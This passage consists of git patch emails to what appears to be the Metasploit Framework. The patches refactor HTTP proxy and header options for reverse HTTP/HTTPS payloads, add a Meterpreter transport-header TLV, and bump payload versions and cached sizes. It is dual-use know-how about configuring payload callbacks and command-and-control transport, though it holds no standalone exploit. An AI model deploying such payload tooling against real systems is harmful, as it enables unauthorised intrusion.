(ds['OverrideRequestHost'] == true ? ds['OverrideRequestLPORT'] : ds['LPORT']).to_s, - ds['LURI'].to_s, - uri, - '/' - ].join('') + unless opts[:url].to_s == '' + uri = "/#{opts[:url].split('/').reject(&:empty?)[-1]}" + callback_url = [ + opts[:url].to_s.split(':')[0], + '://', + (ds['OverrideRequestHost'] == true ? ds['OverrideRequestLHOST'] : ds['LHOST']).to_s, + ':', + (ds['OverrideRequestHost'] == true ? ds['OverrideRequestLPORT'] : ds['LPORT']).to_s, + ds['LURI'].to_s, + uri, + '/' + ].join('') - # patch in the various payload related configuration - met.sub!('HTTP_CONNECTION_URL = None', "HTTP_CONNECTION_URL = '#{var_escape.call(callback_url)}'") - met.sub!('HTTP_USER_AGENT = None', "HTTP_USER_AGENT = '#{var_escape.call(http_user_agent)}'") if http_user_agent.to_s != '' - met.sub!('HTTP_COOKIE = None', "HTTP_COOKIE = '#{var_escape.call(http_header_cookie)}'") if http_header_cookie.to_s != '' - met.sub!('HTTP_HOST = None', "HTTP_HOST = '#{var_escape.call(http_header_host)}'") if http_header_host.to_s != '' - met.sub!('HTTP_REFERER = None', "HTTP_REFERER = '#{var_escape.call(http_header_referer)}'") if http_header_referer.to_s != '' + # patch in the various payload related configuration + met.sub!('HTTP_CONNECTION_URL = None', "HTTP_CONNECTION_URL = '#{var_escape.call(callback_url)}'") + met.sub!('HTTP_USER_AGENT = None', "HTTP_USER_AGENT = '#{var_escape.call(http_user_agent)}'") if http_user_agent.to_s != '' + met.sub!('HTTP_COOKIE = None', "HTTP_COOKIE = '#{var_escape.call(http_header_cookie)}'") if http_header_cookie.to_s != '' + met.sub!('HTTP_HOST = None', "HTTP_HOST = '#{var_escape.call(http_header_host)}'") if http_header_host.to_s != '' + met.sub!('HTTP_REFERER = None', "HTTP_REFERER = '#{var_escape.call(http_header_referer)}'") if http_header_referer.to_s != '' - if http_proxy_host.to_s != '' - proxy_url = "http://#{http_proxy_host}:#{http_proxy_port}" - met.sub!('HTTP_PROXY = None', "HTTP_PROXY = '#{var_escape.call(proxy_url)}'") + if http_proxy_host.to_s != '' + proxy_url = "http://#{http_proxy_host}:#{http_proxy_port}" + met.sub!('HTTP_PROXY = None', "HTTP_PROXY = '#{var_escape.call(proxy_url)}'") + end end # patch in any optional stageless tcp socket setup From 85acbadf01fe707be6a09a37da0f7c1a7c3d40e4 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Thu, 21 Sep 2017 03:05:03 -0500 Subject: [PATCH 177/254] more DRYing --- lib/msf/core/handler/reverse_https_proxy.rb | 11 ++++------- 1 file changed, 4 insertions(+), 7 deletions(-) diff --git a/lib/msf/core/handler/reverse_https_proxy.rb b/lib/msf/core/handler/reverse_https_proxy.rb index 1642460ad5..33269e20e2 100644 --- a/lib/msf/core/handler/reverse_https_proxy.rb +++ b/lib/msf/core/handler/reverse_https_proxy.rb @@ -39,13 +39,10 @@ module ReverseHttpsProxy register_options( [ OptAddressLocal.new('LHOST', "The local listener hostname", default: "127.0.0.1"), - OptPort.new('LPORT', "The local listener port", default: 8443), - OptString.new('HttpProxyHost', "The proxy server's IP address", required: true, default: "127.0.0.1", aliases: ['PayloadProxyHost']), - OptPort.new('HttpProxyPort', "The proxy port to connect to", required: true, default: 8080, aliases: ['PayloadProxyPort']), - OptEnum.new('HttpProxyType', 'The proxy type, HTTP or SOCKS', enums: ['HTTP', 'SOCKS'], aliases: ['PayloadProxyType']), - OptString.new('HttpProxyUser', "An optional username for HTTP proxy authentication", aliases: ['PayloadProxyUser']), - OptString.new('HttpProxyPass', "An optional password for HTTP proxy authentication", aliases: ['PayloadProxyPass']) - ], Msf::Handler::ReverseHttpsProxy) + OptPort.new('LPORT', "The local listener port", default: 8443) + ] + + Msf::Opt::http_proxy_options, + Msf::Handler::ReverseHttpsProxy) register_advanced_options( [ From ea37196614476065efd3fd002a45573589608736 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Thu, 21 Sep 2017 08:27:58 -0500 Subject: [PATCH 178/254] use cooler names c/o @timwr, make options easier to grep --- lib/msf/core/opt.rb | 44 +++++-------------- lib/msf/core/payload/java/reverse_http.rb | 6 +-- .../core/payload/python/meterpreter_loader.rb | 6 +-- lib/msf/core/payload/python/reverse_http.rb | 6 +-- lib/msf/core/payload/transport_config.rb | 6 +-- lib/msf/core/payload/windows/reverse_http.rb | 6 +-- .../core/payload/windows/x64/reverse_http.rb | 6 +-- 7 files changed, 29 insertions(+), 51 deletions(-) diff --git a/lib/msf/core/opt.rb b/lib/msf/core/opt.rb index 3009710a1e..33e1beed32 100644 --- a/lib/msf/core/opt.rb +++ b/lib/msf/core/opt.rb @@ -59,8 +59,7 @@ module Msf # @return [OptEnum] def self.SSLVersion - Msf::OptEnum.new( - 'SSLVersion', + Msf::OptEnum.new('SSLVersion', 'Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate)', enums: self.ssl_supported_options ) @@ -68,14 +67,12 @@ module Msf def self.stager_retry_options [ - OptInt.new( - 'StagerRetryCount', + OptInt.new('StagerRetryCount', 'The number of times the stager should retry if the first connect fails', default: 10, aliases: ['ReverseConnectRetries'] ), - OptInt.new( - 'StagerRetryWait', + OptInt.new('StagerRetryWait', 'Number of seconds to wait for the stager between reconnect attempts', default: 5 ) @@ -84,29 +81,19 @@ module Msf def self.http_proxy_options [ - OptString.new( - 'HttpProxyHost', - 'An optional proxy server IP address or hostname', + OptString.new('HttpProxyHost', 'An optional proxy server IP address or hostname', aliases: ['PayloadProxyHost'] ), - OptPort.new( - 'HttpProxyPort', - 'An optional proxy server port', + OptPort.new('HttpProxyPort', 'An optional proxy server port', aliases: ['PayloadProxyPort'] ), - OptString.new( - 'HttpProxyUser', - 'An optional proxy server username', + OptString.new('HttpProxyUser', 'An optional proxy server username', aliases: ['PayloadProxyUser'] ), - OptString.new( - 'HttpProxyPass', - 'An optional proxy server password', + OptString.new('HttpProxyPass', 'An optional proxy server password', aliases: ['PayloadProxyPass'] ), - OptEnum.new( - 'HttpProxyType', - 'The type of HTTP proxy', + OptEnum.new('HttpProxyType', 'The type of HTTP proxy', enums: ['HTTP', 'SOCKS'], aliases: ['PayloadProxyType'] ) @@ -115,18 +102,9 @@ module Msf def self.http_header_options [ - OptString.new( - 'HttpHeaderHost', - 'An optional value to use for the Host HTTP header' - ), - OptString.new( - 'HttpHeaderCookie', - 'An optional value to use for the Cookie HTTP header' - ), - OptString.new( - 'HttpHeaderReferer', - 'An optional value to use for the Referer HTTP header' - ) + OptString.new('HttpHostHeader', 'An optional value to use for the Host HTTP header'), + OptString.new('HttpCookie', 'An optional value to use for the Cookie HTTP header'), + OptString.new('HttpReferer', 'An optional value to use for the Referer HTTP header') ] end diff --git a/lib/msf/core/payload/java/reverse_http.rb b/lib/msf/core/payload/java/reverse_http.rb index 297184e92d..a454191032 100644 --- a/lib/msf/core/payload/java/reverse_http.rb +++ b/lib/msf/core/payload/java/reverse_http.rb @@ -68,9 +68,9 @@ module Payload::Java::ReverseHttp c = '' c << "Spawn=#{ds["Spawn"] || 2}\n" c << "HeaderUser-Agent=#{ds["HttpUserAgent"]}\n" if ds["HttpUserAgent"] - c << "HeaderHost=#{ds["HttpHeaderHost"]}\n" if ds["HttpHeaderHost"] - c << "HeaderReferer=#{ds["HttpHeaderReferer"]}\n" if ds["HttpHeaderReferer"] - c << "HeaderCookie=#{ds["HttpHeaderCookie"]}\n" if ds["HttpHeaderCookie"] + c << "HeaderHost=#{ds["HttpHostHeader"]}\n" if ds["HttpHostHeader"] + c << "HeaderReferer=#{ds["HttpReferer"]}\n" if ds["HttpReferer"] + c << "HeaderCookie=#{ds["HttpCookie"]}\n" if ds["HttpCookie"] c << "URL=#{scheme}://#{ds['LHOST']}" c << ":#{ds['LPORT']}" if ds['LPORT'] c << luri diff --git a/lib/msf/core/payload/python/meterpreter_loader.rb b/lib/msf/core/payload/python/meterpreter_loader.rb index 11cb72d6c7..5bb0143857 100644 --- a/lib/msf/core/payload/python/meterpreter_loader.rb +++ b/lib/msf/core/payload/python/meterpreter_loader.rb @@ -98,9 +98,9 @@ module Payload::Python::MeterpreterLoader http_user_agent = opts[:http_user_agent] || ds['HttpUserAgent'] http_proxy_host = opts[:http_proxy_host] || ds['HttpProxyHost'] || ds['PROXYHOST'] http_proxy_port = opts[:http_proxy_port] || ds['HttpProxyPort'] || ds['PROXYPORT'] - http_header_host = opts[:header_host] || ds['HttpHeaderHost'] - http_header_cookie = opts[:header_cookie] || ds['HttpHeaderCookie'] - http_header_referer = opts[:header_referer] || ds['HttpHeaderReferer'] + http_header_host = opts[:header_host] || ds['HttpHostHeader'] + http_header_cookie = opts[:header_cookie] || ds['HttpCookie'] + http_header_referer = opts[:header_referer] || ds['HttpReferer'] # The callback URL can be different to the one that we're receiving from the interface # so we need to generate it diff --git a/lib/msf/core/payload/python/reverse_http.rb b/lib/msf/core/payload/python/reverse_http.rb index 30a0e34fe3..f0981c9796 100644 --- a/lib/msf/core/payload/python/reverse_http.rb +++ b/lib/msf/core/payload/python/reverse_http.rb @@ -28,9 +28,9 @@ module Payload::Python::ReverseHttp proxy_host: ds['HttpProxyHost'], proxy_port: ds['HttpProxyPort'], user_agent: ds['HttpUserAgent'], - header_host: ds['HttpHeaderHost'], - header_cookie: ds['HttpHeaderCookie'], - header_referer: ds['HttpHeaderReferer'] + header_host: ds['HttpHostHeader'], + header_cookie: ds['HttpCookie'], + header_referer: ds['HttpReferer'] }) opts[:scheme] = 'http' if opts[:scheme].nil? diff --git a/lib/msf/core/payload/transport_config.rb b/lib/msf/core/payload/transport_config.rb index 284347e1cb..7258561544 100644 --- a/lib/msf/core/payload/transport_config.rb +++ b/lib/msf/core/payload/transport_config.rb @@ -83,9 +83,9 @@ private def get_custom_headers(ds) headers = "" - headers << "Host: #{ds['HttpHeaderHost']}\r\n" if ds['HttpHeaderHost'] - headers << "Cookie: #{ds['HttpHeaderCookie']}\r\n" if ds['HttpHeaderCookie'] - headers << "Referer: #{ds['HttpHeaderReferer']}\r\n" if ds['HttpHeaderReferer'] + headers << "Host: #{ds['HttpHostHeader']}\r\n" if ds['HttpHostHeader'] + headers << "Cookie: #{ds['HttpCookie']}\r\n" if ds['HttpCookie'] + headers << "Referer: #{ds['HttpReferer']}\r\n" if ds['HttpReferer'] if headers.length > 0 headers diff --git a/lib/msf/core/payload/windows/reverse_http.rb b/lib/msf/core/payload/windows/reverse_http.rb index c5895d9f2a..db89b7138d 100644 --- a/lib/msf/core/payload/windows/reverse_http.rb +++ b/lib/msf/core/payload/windows/reverse_http.rb @@ -72,9 +72,9 @@ module Payload::Windows::ReverseHttp # def get_custom_headers(ds) headers = "" - headers << "Host: #{ds['HttpHeaderHost']}\r\n" if ds['HttpHeaderHost'] - headers << "Cookie: #{ds['HttpHeaderCookie']}\r\n" if ds['HttpHeaderCookie'] - headers << "Referer: #{ds['HttpHeaderReferer']}\r\n" if ds['HttpHeaderReferer'] + headers << "Host: #{ds['HttpHostHeader']}\r\n" if ds['HttpHostHeader'] + headers << "Cookie: #{ds['HttpCookie']}\r\n" if ds['HttpCookie'] + headers << "Referer: #{ds['HttpReferer']}\r\n" if ds['HttpReferer'] if headers.length > 0 headers diff --git a/lib/msf/core/payload/windows/x64/reverse_http.rb b/lib/msf/core/payload/windows/x64/reverse_http.rb index f31cf1ca24..d42d3497f2 100644 --- a/lib/msf/core/payload/windows/x64/reverse_http.rb +++ b/lib/msf/core/payload/windows/x64/reverse_http.rb @@ -77,9 +77,9 @@ module Payload::Windows::ReverseHttp_x64 # def get_custom_headers(ds) headers = "" - headers << "Host: #{ds['HttpHeaderHost']}\r\n" if ds['HttpHeaderHost'] - headers << "Cookie: #{ds['HttpHeaderCookie']}\r\n" if ds['HttpHeaderCookie'] - headers << "Referer: #{ds['HttpHeaderReferer']}\r\n" if ds['HttpHeaderReferer'] + headers << "Host: #{ds['HttpHostHeader']}\r\n" if ds['HttpHostHeader'] + headers << "Cookie: #{ds['HttpCookie']}\r\n" if ds['HttpCookie'] + headers << "Referer: #{ds['HttpReferer']}\r\n" if ds['HttpReferer'] if headers.length > 0 headers From fea28a89a5c1da39be035791d875c0b7126d24bd Mon Sep 17 00:00:00 2001 From: OJ Date: Wed, 4 Oct 2017 10:44:28 +1000 Subject: [PATCH 179/254] Fix TLV defs for http headers --- lib/rex/post/meterpreter/client_core.rb | 24 ++++++++++++++---------- lib/rex/post/meterpreter/packet.rb | 3 ++- 2 files changed, 16 insertions(+), 11 deletions(-) diff --git a/lib/rex/post/meterpreter/client_core.rb b/lib/rex/post/meterpreter/client_core.rb index 69d509ef89..79132a548c 100644 --- a/lib/rex/post/meterpreter/client_core.rb +++ b/lib/rex/post/meterpreter/client_core.rb @@ -139,15 +139,16 @@ class ClientCore < Extension response.each(TLV_TYPE_TRANS_GROUP) { |t| result[:transports] << { - :url => t.get_tlv_value(TLV_TYPE_TRANS_URL), - :comm_timeout => t.get_tlv_value(TLV_TYPE_TRANS_COMM_TIMEOUT), - :retry_total => t.get_tlv_value(TLV_TYPE_TRANS_RETRY_TOTAL), - :retry_wait => t.get_tlv_value(TLV_TYPE_TRANS_RETRY_WAIT), - :ua => t.get_tlv_value(TLV_TYPE_TRANS_UA), - :proxy_host => t.get_tlv_value(TLV_TYPE_TRANS_PROXY_HOST), - :proxy_user => t.get_tlv_value(TLV_TYPE_TRANS_PROXY_USER), - :proxy_pass => t.get_tlv_value(TLV_TYPE_TRANS_PROXY_PASS), - :cert_hash => t.get_tlv_value(TLV_TYPE_TRANS_CERT_HASH) + :url => t.get_tlv_value(TLV_TYPE_TRANS_URL), + :comm_timeout => t.get_tlv_value(TLV_TYPE_TRANS_COMM_TIMEOUT), + :retry_total => t.get_tlv_value(TLV_TYPE_TRANS_RETRY_TOTAL), + :retry_wait => t.get_tlv_value(TLV_TYPE_TRANS_RETRY_WAIT), + :ua => t.get_tlv_value(TLV_TYPE_TRANS_UA), + :proxy_host => t.get_tlv_value(TLV_TYPE_TRANS_PROXY_HOST), + :proxy_user => t.get_tlv_value(TLV_TYPE_TRANS_PROXY_USER), + :proxy_pass => t.get_tlv_value(TLV_TYPE_TRANS_PROXY_PASS), + :cert_hash => t.get_tlv_value(TLV_TYPE_TRANS_CERT_HASH), + :custom_headers => t.get_tlv_value(TLV_TYPE_TRANS_HEADERS) } } @@ -555,6 +556,7 @@ class ClientCore < Extension # We cannot migrate into a process that we are unable to open # On linux, arch is empty even if we can access the process if client.platform == 'windows' + if target_process['arch'] == nil || target_process['arch'].empty? raise RuntimeError, "Cannot migrate into this process (insufficient privileges)", caller end @@ -718,7 +720,8 @@ private # Get a reference to the currently active transport. # def get_current_transport - transport_list[:transports][0] + x = transport_list + x[:transports][0] end # @@ -728,6 +731,7 @@ private def generate_migrate_stub(target_process) stub = nil + if client.platform == 'windows' && [ARCH_X86, ARCH_X64].include?(client.arch) t = get_current_transport diff --git a/lib/rex/post/meterpreter/packet.rb b/lib/rex/post/meterpreter/packet.rb index a027e25233..35fb4b0da1 100644 --- a/lib/rex/post/meterpreter/packet.rb +++ b/lib/rex/post/meterpreter/packet.rb @@ -102,7 +102,8 @@ TLV_TYPE_TRANS_PROXY_USER = TLV_META_TYPE_STRING | 437 TLV_TYPE_TRANS_PROXY_PASS = TLV_META_TYPE_STRING | 438 TLV_TYPE_TRANS_RETRY_TOTAL = TLV_META_TYPE_UINT | 439 TLV_TYPE_TRANS_RETRY_WAIT = TLV_META_TYPE_UINT | 440 -TLV_TYPE_TRANS_GROUP = TLV_META_TYPE_GROUP | 441 +TLV_TYPE_TRANS_HEADERS = TLV_META_TYPE_STRING | 441 +TLV_TYPE_TRANS_GROUP = TLV_META_TYPE_GROUP | 442 TLV_TYPE_MACHINE_ID = TLV_META_TYPE_STRING | 460 TLV_TYPE_UUID = TLV_META_TYPE_RAW | 461 From 40509856493bc36ad8194257cc8548e6209dfb1b Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Tue, 21 Nov 2017 13:53:33 -0600 Subject: [PATCH 180/254] update payloads --- Gemfile.lock | 4 ++-- metasploit-framework.gemspec | 2 +- modules/payloads/singles/cmd/unix/reverse_nodejs.rb | 2 +- modules/payloads/singles/java/shell_reverse_tcp.rb | 2 +- .../payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb | 2 +- .../singles/linux/mipsbe/meterpreter_reverse_https.rb | 2 +- .../payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb | 2 +- modules/payloads/singles/nodejs/shell_reverse_tcp.rb | 2 +- modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb | 2 +- modules/payloads/singles/python/meterpreter_bind_tcp.rb | 2 +- modules/payloads/singles/python/meterpreter_reverse_http.rb | 2 +- modules/payloads/singles/python/meterpreter_reverse_https.rb | 2 +- modules/payloads/singles/python/meterpreter_reverse_tcp.rb | 2 +- modules/payloads/singles/windows/meterpreter_bind_tcp.rb | 2 +- modules/payloads/singles/windows/meterpreter_reverse_http.rb | 2 +- modules/payloads/singles/windows/meterpreter_reverse_https.rb | 2 +- .../payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb | 2 +- modules/payloads/singles/windows/meterpreter_reverse_tcp.rb | 2 +- modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb | 2 +- .../payloads/singles/windows/x64/meterpreter_reverse_http.rb | 2 +- .../payloads/singles/windows/x64/meterpreter_reverse_https.rb | 2 +- .../singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb | 2 +- .../payloads/singles/windows/x64/meterpreter_reverse_tcp.rb | 2 +- modules/payloads/stagers/java/bind_tcp.rb | 2 +- modules/payloads/stagers/java/reverse_http.rb | 2 +- modules/payloads/stagers/java/reverse_https.rb | 2 +- modules/payloads/stagers/java/reverse_tcp.rb | 2 +- modules/payloads/stagers/windows/reverse_http.rb | 2 +- modules/payloads/stagers/windows/reverse_https.rb | 2 +- modules/payloads/stagers/windows/reverse_https_proxy.rb | 2 +- modules/payloads/stagers/windows/reverse_winhttp.rb | 2 +- modules/payloads/stagers/windows/reverse_winhttps.rb | 2 +- modules/payloads/stagers/windows/x64/reverse_http.rb | 2 +- modules/payloads/stagers/windows/x64/reverse_https.rb | 2 +- modules/payloads/stagers/windows/x64/reverse_winhttp.rb | 2 +- modules/payloads/stagers/windows/x64/reverse_winhttps.rb | 2 +- 36 files changed, 37 insertions(+), 37 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index c20a197a6d..f83e37305d 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -17,7 +17,7 @@ PATH metasploit-concern metasploit-credential metasploit-model - metasploit-payloads (= 1.3.14) + metasploit-payloads (= 1.3.15) metasploit_data_models metasploit_payloads-mettle (= 0.2.5) msgpack @@ -178,7 +178,7 @@ GEM activemodel (~> 4.2.6) activesupport (~> 4.2.6) railties (~> 4.2.6) - metasploit-payloads (1.3.14) + metasploit-payloads (1.3.15) metasploit_data_models (2.0.15) activerecord (~> 4.2.6) activesupport (~> 4.2.6) diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index b5909960ca..594a372aa0 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -70,7 +70,7 @@ Gem::Specification.new do |spec| # are needed when there's no database spec.add_runtime_dependency 'metasploit-model' # Needed for Meterpreter - spec.add_runtime_dependency 'metasploit-payloads', '1.3.14' + spec.add_runtime_dependency 'metasploit-payloads', '1.3.15' # Needed for the next-generation POSIX Meterpreter spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.2.5' # Needed by msfgui and other rpc components diff --git a/modules/payloads/singles/cmd/unix/reverse_nodejs.rb b/modules/payloads/singles/cmd/unix/reverse_nodejs.rb index 6622bbfef4..4b20b17172 100644 --- a/modules/payloads/singles/cmd/unix/reverse_nodejs.rb +++ b/modules/payloads/singles/cmd/unix/reverse_nodejs.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options' module MetasploitModule - CachedSize = 3239 + CachedSize = 3231 include Msf::Payload::Single include Msf::Payload::NodeJS diff --git a/modules/payloads/singles/java/shell_reverse_tcp.rb b/modules/payloads/singles/java/shell_reverse_tcp.rb index 4fa8c97d53..d87445f832 100644 --- a/modules/payloads/singles/java/shell_reverse_tcp.rb +++ b/modules/payloads/singles/java/shell_reverse_tcp.rb @@ -9,7 +9,7 @@ require 'msf/base/sessions/command_shell_options' module MetasploitModule - CachedSize = 7359 + CachedSize = 7544 include Msf::Payload::Single include Msf::Payload::Java diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb index d1749f9c25..3a5b484828 100644 --- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsbe_linux' module MetasploitModule - CachedSize = 1053924 + CachedSize = 1029776 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb index bc1d3f2c08..bc464ffbc7 100644 --- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsbe_linux' module MetasploitModule - CachedSize = 1053924 + CachedSize = 1029776 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb index cc021b9ff2..a01c6f9db5 100644 --- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsbe_linux' module MetasploitModule - CachedSize = 1053924 + CachedSize = 1029776 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/nodejs/shell_reverse_tcp.rb b/modules/payloads/singles/nodejs/shell_reverse_tcp.rb index 6cd4278eb5..dffa4838b1 100644 --- a/modules/payloads/singles/nodejs/shell_reverse_tcp.rb +++ b/modules/payloads/singles/nodejs/shell_reverse_tcp.rb @@ -13,7 +13,7 @@ require 'msf/base/sessions/command_shell' module MetasploitModule - CachedSize = 805 + CachedSize = 803 include Msf::Payload::Single include Msf::Payload::NodeJS diff --git a/modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb b/modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb index d2fa02fa4b..29cbe3588d 100644 --- a/modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb +++ b/modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options' module MetasploitModule - CachedSize = 833 + CachedSize = 831 include Msf::Payload::Single include Msf::Payload::NodeJS diff --git a/modules/payloads/singles/python/meterpreter_bind_tcp.rb b/modules/payloads/singles/python/meterpreter_bind_tcp.rb index 3d097c72a7..f5e7303a36 100644 --- a/modules/payloads/singles/python/meterpreter_bind_tcp.rb +++ b/modules/payloads/singles/python/meterpreter_bind_tcp.rb @@ -11,7 +11,7 @@ require 'msf/base/sessions/meterpreter_python' module MetasploitModule - CachedSize = 56570 + CachedSize = 57798 include Msf::Payload::Single include Msf::Payload::Python diff --git a/modules/payloads/singles/python/meterpreter_reverse_http.rb b/modules/payloads/singles/python/meterpreter_reverse_http.rb index 354fd0852e..f016ee0023 100644 --- a/modules/payloads/singles/python/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/python/meterpreter_reverse_http.rb @@ -11,7 +11,7 @@ require 'msf/base/sessions/meterpreter_python' module MetasploitModule - CachedSize = 56530 + CachedSize = 57762 include Msf::Payload::Single include Msf::Payload::Python diff --git a/modules/payloads/singles/python/meterpreter_reverse_https.rb b/modules/payloads/singles/python/meterpreter_reverse_https.rb index dbf19dc526..d13916ecb6 100644 --- a/modules/payloads/singles/python/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/python/meterpreter_reverse_https.rb @@ -11,7 +11,7 @@ require 'msf/base/sessions/meterpreter_python' module MetasploitModule - CachedSize = 56534 + CachedSize = 57762 include Msf::Payload::Single include Msf::Payload::Python diff --git a/modules/payloads/singles/python/meterpreter_reverse_tcp.rb b/modules/payloads/singles/python/meterpreter_reverse_tcp.rb index f63420ede9..721b61e0de 100644 --- a/modules/payloads/singles/python/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/python/meterpreter_reverse_tcp.rb @@ -11,7 +11,7 @@ require 'msf/base/sessions/meterpreter_python' module MetasploitModule - CachedSize = 56486 + CachedSize = 57714 include Msf::Payload::Single include Msf::Payload::Python diff --git a/modules/payloads/singles/windows/meterpreter_bind_tcp.rb b/modules/payloads/singles/windows/meterpreter_bind_tcp.rb index 4aa49bfccd..79e23e6a0c 100644 --- a/modules/payloads/singles/windows/meterpreter_bind_tcp.rb +++ b/modules/payloads/singles/windows/meterpreter_bind_tcp.rb @@ -12,7 +12,7 @@ require 'rex/payloads/meterpreter/config' module MetasploitModule - CachedSize = 179267 + CachedSize = 179779 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/meterpreter_reverse_http.rb b/modules/payloads/singles/windows/meterpreter_reverse_http.rb index 12cb6341e7..2bcca8d51c 100644 --- a/modules/payloads/singles/windows/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/windows/meterpreter_reverse_http.rb @@ -12,7 +12,7 @@ require 'rex/payloads/meterpreter/config' module MetasploitModule - CachedSize = 180311 + CachedSize = 180825 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/meterpreter_reverse_https.rb b/modules/payloads/singles/windows/meterpreter_reverse_https.rb index 539bfd288f..2f470a05b9 100644 --- a/modules/payloads/singles/windows/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/windows/meterpreter_reverse_https.rb @@ -12,7 +12,7 @@ require 'rex/payloads/meterpreter/config' module MetasploitModule - CachedSize = 180311 + CachedSize = 180825 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb b/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb index 23d9de6df9..dce4c880d4 100644 --- a/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb +++ b/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb @@ -12,7 +12,7 @@ require 'rex/payloads/meterpreter/config' module MetasploitModule - CachedSize = 179267 + CachedSize = 179779 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb b/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb index 256f5b6225..bacdd2591d 100644 --- a/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb @@ -12,7 +12,7 @@ require 'rex/payloads/meterpreter/config' module MetasploitModule - CachedSize = 179267 + CachedSize = 179779 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb index 058078b353..86df5d345e 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb @@ -12,7 +12,7 @@ require 'rex/payloads/meterpreter/config' module MetasploitModule - CachedSize = 205379 + CachedSize = 205891 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb index 0398f24b52..b88ce277d6 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb @@ -12,7 +12,7 @@ require 'rex/payloads/meterpreter/config' module MetasploitModule - CachedSize = 206423 + CachedSize = 206937 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb index 5679a3a8be..f3fd8e639b 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb @@ -12,7 +12,7 @@ require 'rex/payloads/meterpreter/config' module MetasploitModule - CachedSize = 206423 + CachedSize = 206937 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb index bb151559da..102840f525 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb @@ -12,7 +12,7 @@ require 'rex/payloads/meterpreter/config' module MetasploitModule - CachedSize = 205379 + CachedSize = 205891 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb index 337ebe2c73..b38fe1f070 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb +++ 